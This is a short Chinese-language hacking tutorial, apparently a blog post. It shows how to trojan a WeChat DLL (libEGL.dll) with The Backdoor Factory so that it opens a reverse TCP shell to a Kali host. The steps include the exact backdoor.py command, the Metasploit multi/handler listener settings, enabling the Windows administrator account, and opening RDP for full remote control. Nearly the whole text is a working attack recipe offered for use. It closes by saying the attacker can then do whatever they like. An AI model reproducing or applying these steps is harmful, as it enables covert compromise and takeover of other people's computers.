准备的工具:kali虚拟机 W7虚拟机 微信 ProcessExplorer the-backdoor-factory-master
打开微信 打开process 找到微信的动态链接文件
随便打开一个lib文件的所在文件夹找到libEGL.dll,复制到主机上(只要后缀是dll的动态链接库文件都可以的)
然后打开kali虚拟机把下载the-backdoor-factory-master(BDF劫持工具,可用于DLL注入)
命令为:gei clone https://github.com/cream492/the-backdoor-factory
然后把主机上复制出来的dll文件复制到kali上下载好的BDF文件夹中
然后cd到BDF目录下输入代码生成动态链接库的劫持文件
(有可能输入代码的时候显示缺少模块,自己下载模块就好了)
./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H kali的ip
然后选择注入类型,这里我们只有一个选择所以选1就好了
然后把我们注入了后门的这个dll文件复制到win7的里面覆盖掉之前的原文件
然后开启postgresql服务
/etc/init.d/postgresql start
msfconsole 开启MSF
然后设置监听的端口和IP
use exploit/multi/handler 打开exp
set payload windows/shell_reverse_tcp
show options 查看需要设置的参数
set lhost kali的IP 设置监听IP
set lport 6666(刚才生成时设置的端口) 设置监听端口
然后输入exploit开始监听并打开w7的微信(不用登陆)然后就进入到了微信目录下的DOS命令下了
激活administrator
net user administrator /active:yes
至此我们就成功的进入到了win7了
可以开启3389端口使用kali的rdesktop+w7IP 远程连接w7桌面
不知道账户密码的情况下我们要先修改一个账户的密码哦,有账户和密码才可以进行远程连接
然后就可以为所欲为喽=。=